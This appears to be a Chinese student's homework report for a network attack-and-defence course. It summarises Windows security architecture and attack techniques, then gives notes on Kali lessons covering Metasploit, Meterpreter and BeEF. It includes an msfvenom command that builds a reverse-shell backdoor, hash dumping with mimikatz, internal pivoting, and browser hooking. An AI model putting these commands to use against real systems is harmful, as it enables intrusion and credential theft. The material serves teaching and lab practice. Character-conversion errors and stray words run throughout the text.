20189315《網絡攻防實踐》第七週做業

a.教材第七章做業

第七章Windouws操做系統安全攻防的內容進行學習。Windouws是目前市場上佔統治地位的操做系統,到2010年,已經佔據了百分之八十八的市場份額。基本結構分爲運行於處理器特權模式的操做系統內核,已經運行在處理器非特權模式的用戶空間代碼,與UNIX同樣,採用宏內核模式來進行架構,這也使得系統更容易遭受Rootkit的危害,爲了應對這種攻擊,採用數字簽名的辦法提升安全性。Windows操做系統中,有用戶,用戶組和計算機三大類,對於每一個安全主體,空間和時間上都全局惟一的SID安全標識符來進行標識.對於Windows,遠程攻擊技術分爲:遠程口令猜想與破解攻擊,攻擊Windows網絡服務,攻擊Windows客戶端及用戶這三大類。Windows經過基於服務器消息塊協議承載的文件與打印共享服務來爲網絡用戶提供遠程訪問文件系統的和打印機的支持,因此SMB協議也成爲了攻擊者實施遠程口令字猜想的攻擊渠道,目前自動執行遠程口令字猜想的工具備不少,其中比較流行的包括legin,enum,NTSscan等。攻擊者在目標系統上達到本身的需求和目的後,通常還會在系統中植入遠程控制系統,維持對這臺主機的控制權,好比一些命令行遠程控制工具Netcat,或者圖形化遠程控制工具,其中最著名的是VNC軟件。html

Windows操做系統基本框架

一、windows基本結構分爲運行於處理器特權模式的操做系統內核以及運行在處理器非特權模式的用戶,即爲內核態和用戶態。
二、內核態:windows執行體、windows內核體、設備驅動程序、硬件抽象層、windows窗口與圖形界面接口。
三、用戶態:系統支持進程、環境子系統服務進程、服務進程、用戶應用軟件、核心子系統DLL。
四、核心機制:進程和線程管理機制、內存管理機制、文件管理機制、註冊表管理機制、網絡管理機制。
五、網絡管理機制:網卡硬件驅動程序(物理層)、NDIS庫以及miniport驅動程序(鏈路層)、TDI傳輸層(網絡協議驅動)(網絡層和傳輸層)、網絡APID以及TDI客戶端(會話層和表示層)、網絡應用程序和服務進程(應用層)。web

安全體系結構和機制

一、監控器模型:主體到客體的訪問都經過監控器做中間,由引用監控器根據安全訪問控制策略來進行受權訪問,全部訪問記錄都由監控器生成審計日誌。
二、核心:SRM安全引用監控(內核中)、LSASS安全服務(用戶態)、winlogon/netlogn、以及Eventlog
三、身份認證機制:安全主體:用戶、用戶組、計算機 身份認證:本地身份認證(winlogon進程、GINA圖形化登陸窗口與LSASS服務)、網絡身份認證(NTLM、Lanman、kerberos)
四、受權與訪問控制機制:對象:文件,目錄,註冊表鍵值,內核對象,同步對象,私有對象,管道,內存,通訊接口。 屬性組成:Owner SID,Group SID,DACL自主訪問控制列表,SACL系統審計訪問控制列表。
五、安全審計機制
六、其餘安全機制:安全中心(防火牆、補丁自動更新、病毒防禦),IPsec加載和驗證機制,EPS加密文件系統,windows文件保護機制,捆綁的IE瀏覽器所提供的隱私保護和瀏覽器安全保護機制。算法

遠程安全攻防技術

一、包括遠程口令猜解攻擊、windows網絡服務攻擊,windows客戶端和用戶攻擊。
二、生命週期:windows安全漏洞發現,利用與修補過程 安全漏洞公開披露信息 CVE,NVD,SecyrityFocus,OSVDB 針對特定目標的滲透測試攻擊過程:漏洞掃描測試、查找針對發現漏洞的滲透代碼、實施滲透測試 使用metasploit軟件實施滲透測試:用戶接口(CLI、Console,web,GUI)
三、遠程口令猜解攻擊: 遠程口令猜解:SMB協議(tcp44五、tcp139),其餘包括WMI服務、TS遠程桌面終端服務,MY SQL數據庫服務、SharePoint。工具包括:Legion、enum、smbgrind、NTScan、XScan、流光 遠程口令字交換通訊竊聽與破解:NTLM、Lanman、NTLMV2和kerberos網絡認證協議的弱點。 遠程口令猜解的防範:關閉沒必要要的易受攻擊的網絡服務、配置主機防火牆來限制某些端口服務、網絡防火牆限制這些服務的訪問、禁用過期且有安全缺陷的Lanman和NTLM、指定強口令策略。
四、網絡服務遠程滲透攻擊:針對NETBIOS服務的著名漏洞和攻擊、針對SMB服務的著名漏洞和攻擊、針對MSRPC服務的著名漏洞和攻擊、針對windows系統上微軟網絡的遠程滲透攻擊、針對windows系統上第三方服務的遠程滲透攻擊。 防範措施:最基本的是儘可能避免與消除這些滲透攻擊所依賴的服務軟件安全漏洞。sql

本地安全攻防技術

一、本地提權攻擊:利用操做系統內核、特權用戶啓動程序中安全缺陷與漏洞,緣由是服務器和桌面系統沒有即時進行補丁更新。
二、敏感信息竊取: windows系統口令密文提取技術(拷貝口令密文文件、rdisk工具有份、pwdumpx從SAM文件或者活動目錄中提取口令密文) windows系統口令字破解技術(L0phtCrack、John theRipperCain) 用戶敏感數據竊取:find、findstr、grep、meterpreter 本地敏感信息竊取防範:選擇高強度、高防護的口令,使用更安全的加密明文算法,安全配置策略。shell

windows消滅蹤影

一、消滅蹤影:關閉審計功能、清理事件日誌。 防範措施:事先設置系統審計和網絡服務審計,日誌記錄在不可擦除的CDROM上。
二、遠控和後門程序: 遠控:命令行遠控工具(Netcat,psexec,meterpreter),圖形化遠控工具(VNC,RemoteAdmin,PCanyware) 後門程序:國外(BO、BO2K),國內(冰河、灰鴿子、廣外女生、PCshare、磁碟機、機器狗等) 防範措施:後門檢測軟件、殺軟、rootkitrerealer、IcSword。數據庫

b.kali視頻學習

一、Kali漏洞利用之檢索與利用

一、searchsploit能夠藉助關鍵詞搜索漏洞信息以及漏洞對應的expwindows

searchsploit wordpress

二、ikat自動化開啓不一樣的exp。等待目標訪問中招。
瀏覽器

三、termineter旨在評估智能電錶的安全性安全

二、Kali 漏洞利用之Metasploit基礎

Metasploit在滲透測試中常常被用到。這套軟件包括了不少工具,這些工具組成了一個完整的攻擊框架。
一、啓動服務
在Kali中使用Metasploit,須要先開啓PostgreSQL數據庫服務和metasploit服務,而後就能夠利用msf數據庫查詢exploit和記錄。
二、路徑介紹
Kali中msf的路徑爲/usr/share/metasploit-framework
服務器

三、msfpayload:用來生成payload或者shellcode。 搜索能夠用msfpayload -l |gre[ "windows"查詢; -o選項能夠列出payload所需的參數。
msfencode:msf中的編碼器,早期用來繞過AV(殺毒軟件),現經常使用msfpayload與它編碼避免exploit的壞字符串。
msfconsole:開啓metasploit的console。
輸入msfconsole,打開msf

四、測試示例:發現漏洞,搜索exploit
nmap -sV 192.168.1.105
此版本是否存在漏洞,在msf裏用search vsftpd搜索一下

五、測試示例:選擇exploit,查看參數

進入exploit時發生點小問題,檢查以後發現是本身輸入錯誤,改正後正確進入
查看參數,發現RHOST的參數還未設置,接下來爲其設置參數set RHOST 192.168.1.105

六、測試示例:選擇payload

設置好以後,show options查看參數,發現沒有要設置的參數了

七、執行攻擊
輸入exploit便可進行攻擊測試,若是成功,將返回一個shell:

三、Kali漏洞利用之Meterpreter介紹

Meterpreter是metasploit框架中的一個擴展模塊,做爲溢出成功之後的攻擊載荷使用,攻擊載荷在溢出攻擊成功之後紿咱們返回一個控制通道。使用它做爲攻擊載荷可以得到目標系統的—個meterpretershell的連接。
一、生成meterpreter後門
選定攻擊載荷windows/meterpreter/reverse_tcp(針對windows,反向鏈接shell),使用

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.161 LPORT=2333 -e x86/shikata_ga_nai -i 5 -f exe -o /root/backdoor.exe

生成後門

二、監聽設置
生成的後門須要有相應的監聽。打開metasploit的console,配置一個反彈會話處理程序:

三、meterpreter shell
當目標機器成功執行backdoor.exe後,咱們就取得了一個 meterpreter shell 。輸入background返回msf,若是想返回meterpreter shell,輸入sessions查看ID,輸入sessions -i ID選擇想返回的會話。

在meterpreter shell中輸入help查看可執行的命令,如sysinfo顯示目標系統信息,hashdump抓取哈希,pwd顯示當前路徑等。

meterpreter還有一些擴展工具,使用load + tab鍵查看這些工具,而後選擇所需工具進行使用(load mimikatz 用來抓取系統明文)。

四、Kali漏洞利用之Metasploit後滲透測試

在跳板獲取必定權限後須要積極地向內網主機權限發展,獲取指定的目標信息,探查系統漏洞,藉助msf已經獲得的Meterpreter後門,可使系列的操做更容易。
一、查看當前網卡、網段信息(使用ifconfig)。可查看到三個網卡,一個是本地網卡,另外一個是咱們能訪問的網卡,還有一個網卡具備內網IP(訪問不到,能夠ping如下試試)。
二、添加路由表run autoroute -s 10.0.0.1可使用msf中的模塊跨網段攻擊或掃描。可經過腳本autoroute快速添加。
三、開socket代理,經過使用auxiliary/server/socks4a模塊,建立一個socks代理,能夠爲瀏覽器,sqlmap,nmap使用。經過代理便可訪問內網計算機。
四、經過background和session -i能夠自由切換進入session。
五、輸入run能夠看到在meterpreter上能夠作的不少命令。
六、經過run post/能夠看到後滲透測試模塊。
七、獲取內網信息run arp_scanner -r 10.0.0.1/24
八、也能夠上傳文件,作端口轉發後進行後續測試,例如upload lcx.exe c:\傳送文件到c盤根目錄。

五、Kali漏洞利用之BeEF

對XSS漏洞每每須要一個強大的框架支持,如網絡上的XSS平臺,在KALI下,BeEf是一款絲絕不遜於XSS平臺的工具。BeEf是瀏覽器攻擊框架的簡稱,是一款專一於瀏覽器的滲透測試工具,它擴展了跨站漏洞的利用,能hook不少瀏覽器並能夠執行不少內嵌命令。
一、命令行輸入beef-xss,瀏覽器自動訪問頁面


二、假設被測試主機因爲XSS漏洞請求到http://127.0.0.1:3000/demos/basic.html

此時頁面左側就會多出一項在線主機:

三、HOOK持續的時間爲測試頁面時間爲止,在此期間,至關於被控制了,能夠發送攻擊命令,在Command模塊,能夠完成許多功能。

四、選區MISC下的Raw JavaScript模塊做爲測試用例,輸入「hello world!」,點擊excute進行攻擊。

五、Proxy功能(代理功能)
選中目標主機,點右鍵,在菜單中選中Use as Proxy;而後在Rider選項卡中的Forge Request編輯併發送想要發送的內容。

六、BeEF默認是不加載Metasploit的,若是要使用Metasploit豐富的攻擊模塊,須要作些配置.
配置:首先打開beef-xss目錄:

將Metasploit的false修改成true:

保證此處IP等信息設置正確(不適用127.0.0.1,需使用本機IP),並修改Custom路徑:

將host和callback_host行的IP修改成本機IP,並修改custom路徑爲/usr/share/metasploit-framework/
配置好後打開msfconsole,運行命令:

執行./beef -x
從新加載Metasploit的exploit模塊:

加載以後,重啓下服務:service beef-xss restart 此時再訪問如下以前的頁面,發現沒法鏈接,稍等片刻,使用默認用戶密碼登陸進去。發現Metasploit下多了許多模塊。

相關文章
相關標籤/搜索